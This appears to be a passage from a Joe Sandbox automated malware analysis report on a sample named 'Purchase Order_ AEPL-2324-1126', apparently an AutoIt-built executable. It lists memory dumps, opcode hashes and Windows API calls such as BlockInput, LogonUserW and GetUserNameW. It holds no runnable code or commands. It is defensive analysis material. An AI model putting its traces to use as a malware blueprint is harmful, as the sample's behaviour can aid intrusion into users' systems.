                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseCreateDialogHandleNtdllProc_Process
                                  • String ID:
                                  • API String ID: 4178364262-0
                                  • Opcode ID: 18637488ffc27074e36ea774df1fe185273bfafa6678f284e57b2aa28cd93e6f
                                  • Instruction ID: b7a625ee7c2def1aa5d9f3d540ff339fd2ef2d8d1ff8bada222fa30ad2921ed2
                                  • Opcode Fuzzy Hash: 18637488ffc27074e36ea774df1fe185273bfafa6678f284e57b2aa28cd93e6f
                                  • Instruction Fuzzy Hash: B9F06D76240218ABDB00EF88EC50D9B73ADEF8D355B00881AFE449B341CB74BD60CBA4
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000232,?,?), ref: 00454D3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 8b2826b66b2b31c60da67efd8c1127cd395e8061a58d0ebf04d064e84851811b
                                  • Instruction ID: 9a3c2df9a808ce5be259132a16ac8c8eacf78c0d12b80627a94478e4176c466c
                                  • Opcode Fuzzy Hash: 8b2826b66b2b31c60da67efd8c1127cd395e8061a58d0ebf04d064e84851811b
                                  • Instruction Fuzzy Hash: DCF08C70244208BBE310DE48CC45F9B7BA8EB4A715F508109F958572D2CAB07844CBA5
                                  APIs
                                    • Part of subcall function 00430CCB: FreeLibrary.KERNEL32(?), ref: 00430CD8
                                  • NtdllDialogWndProc_W.USER32(?,0000031A,?,?), ref: 0044789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogFreeLibraryNtdllProc_
                                  • String ID:
                                  • API String ID: 4233852882-0
                                  • Opcode ID: 2bb9f87cd0a41e8130f62da48c4106c6c5914e99f78363fa9e43659e77d0986b
                                  • Instruction ID: fc5b3b6852e979a31c658b193d70e7a126e9e4bfaffbe52d983344414c160798
                                  • Opcode Fuzzy Hash: 2bb9f87cd0a41e8130f62da48c4106c6c5914e99f78363fa9e43659e77d0986b
                                  • Instruction Fuzzy Hash: 79E0EDB5D15218BBDB00EFB5DC498EEB7ACEB88301B00896AFC1193241D6749A118FA5
                                  APIs
                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: BlockInput
                                  • String ID:
                                  • API String ID: 3456056419-0
                                  • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                  • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                  • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                  • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000007,?,00000000), ref: 00447B7E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 8e6373e291cc12f70f08d4f4410b7c8524115a22fdba9030887a55257885973c
                                  • Instruction ID: 312b02e0ec000ae8217ec3e2a2b597e760e3ea2cc33aa0823c57154ec146f294
                                  • Opcode Fuzzy Hash: 8e6373e291cc12f70f08d4f4410b7c8524115a22fdba9030887a55257885973c
                                  • Instruction Fuzzy Hash: F0E08635640114BFD600EF85DC51FEB772CEF8A754F20800AFA044B291CA75F802CBA9
                                  APIs
                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LogonUser
                                  • String ID:
                                  • API String ID: 1244722697-0
                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000212), ref: 0044032E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: c8074131f37bb21e52515d0e719f0e6372a069fb1b0bf1c5daab0305562a1656
                                  • Instruction ID: cdfa3c7c0e358d42617837c3919da1626915cb286f17707c0539985eb8f146ed
                                  • Opcode Fuzzy Hash: c8074131f37bb21e52515d0e719f0e6372a069fb1b0bf1c5daab0305562a1656
                                  • Instruction Fuzzy Hash: DFE0B675240248AFD700DF48D898D9A77A9EB89700F048458FA554B3A2C6B0B810CB61
                                  APIs
                                    • Part of subcall function 00470928: DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                  • NtdllDialogWndProc_W.USER32(?,00000002,00000000,00000000), ref: 0047134E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AcceleratorDestroyDialogNtdllProc_Table
                                  • String ID:
                                  • API String ID: 2638641937-0
                                  • Opcode ID: 1fe523bc3ffe7451472abd685aad30700db2524a9dbb340e0d67ef59a1e13db2
                                  • Instruction ID: 049d54cb1fe6716e8d8a3831c4e241097285c9e82ec9b29a3d6a302b973cbdb4
                                  • Opcode Fuzzy Hash: 1fe523bc3ffe7451472abd685aad30700db2524a9dbb340e0d67ef59a1e13db2
                                  • Instruction Fuzzy Hash: 33D012B26C2324B6E51036965D1BFCFFA5CCF1ABA1F108017F704B60C289E9640086FD
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000211), ref: 00440360
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 5f87cae89cac6f8e2d25e27d115a3a7f1dea2ab8eb24d34981d9022fbff52b9c
                                  • Instruction ID: 3c6c68f393c460ac128c5d0723b5b392c07b23a02b9a2d0c15d00fa147821f68
                                  • Opcode Fuzzy Hash: 5f87cae89cac6f8e2d25e27d115a3a7f1dea2ab8eb24d34981d9022fbff52b9c
                                  • Instruction Fuzzy Hash: A4E0EC75240248AFDB00DF48D898E9B77A9FB89700F048458FA554B3A2C7B0F810CFA1
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                  • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                  • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                  • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                  • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                  • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                  • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N@
                                  • API String ID: 0-1509896676
                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                  • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                  • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                  • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                  • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                  APIs
                                  • DeleteObject.GDI32(?), ref: 0045953B
                                  • DeleteObject.GDI32(?), ref: 00459551
                                  • 74285CF0.USER32(?), ref: 00459563
                                  • GetDesktopWindow.USER32 ref: 00459581
                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                  • 742861E0.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                  • 74284620.GDI32(00000000,0000005A), ref: 004598EE
                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                  • _wcslen.LIBCMT ref: 00459916
                                  • _wcscpy.LIBCMT ref: 0045993A
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                  • 7427A570.USER32(00000000,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599FC
                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                  • 7427A480.USER32(00000000,00000000), ref: 00459A42
                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
